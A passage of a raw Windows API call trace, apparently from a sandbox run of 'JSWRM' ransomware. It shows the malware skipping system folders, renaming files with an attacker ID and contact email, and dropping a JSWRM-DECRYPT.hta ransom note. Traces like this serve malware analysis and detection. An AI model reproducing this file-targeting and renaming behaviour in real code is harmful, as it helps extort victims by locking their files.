ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2=".") returned 1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="..") returned 1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="...") returned 1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="windows") returned -1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="recovery") returned -1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="perflogs") returned -1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="documents and settings") returned 1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="system volume information") returned -1 [0068.188] lstrcmpiW (lpString1="oskpred.xml", lpString2="msocache") returned 1 [0068.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpred.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpred.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskpred.xml", lpUsedDefaultChar=0x0) returned 11 [0068.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpred.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpred.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskpred.xml", lpUsedDefaultChar=0x0) returned 11 [0068.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.189] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10084583213355328) returned 0 [0068.189] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.189] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.189] CloseHandle (hObject=0xffffffff) returned 1 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0068.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.190] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.190] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols", cAlternateFileName="")) returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2=".") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="..") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="...") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="windows") returned -1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="recovery") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="perflogs") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="documents and settings") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="$RECYCLE.BIN") returned 1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="system volume information") returned -1 [0068.190] lstrcmpiW (lpString1="symbols", lpString2="msocache") returned 1 [0068.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0068.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\jswrm-decrypt.hta")) returned 0xffffffff [0068.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0068.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0068.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0068.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0068.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.192] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.192] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.193] CloseHandle (hObject=0x458) returned 1 [0068.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0068.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0068.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.194] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\jswrm-decrypt.hta")) returned 0x20 [0068.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0068.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.194] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4d71b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0068.194] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.194] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4d71b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.195] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.195] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.195] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2=".") returned 1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="..") returned 1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="...") returned 1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="windows") returned -1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="recovery") returned -1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="perflogs") returned -1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="documents and settings") returned 1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="system volume information") returned -1 [0068.195] lstrcmpiW (lpString1="ea-sym.xml", lpString2="msocache") returned -1 [0068.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea-sym.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea-sym.xml", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ea-sym.xml", lpUsedDefaultChar=0x0) returned 10 [0068.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea-sym.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea-sym.xml", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ea-sym.xml", lpUsedDefaultChar=0x0) returned 10 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0068.196] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.196] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9958070656657224) returned 0 [0068.196] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.196] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.196] CloseHandle (hObject=0xffffffff) returned 1 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0068.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0068.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.196] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0068.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0068.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0068.197] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2=".") returned 1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="..") returned 1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="...") returned 1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="windows") returned -1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="recovery") returned -1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="perflogs") returned -1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="documents and settings") returned 1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="system volume information") returned -1 [0068.197] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="msocache") returned -1 [0068.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp-sym.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp-sym.xml", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja-jp-sym.xml", lpUsedDefaultChar=0x0) returned 13 [0068.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp-sym.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp-sym.xml", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja-jp-sym.xml", lpUsedDefaultChar=0x0) returned 13 [0068.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0068.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.197] RtlAllocateHeap (HeapHandle=0x1e0000, 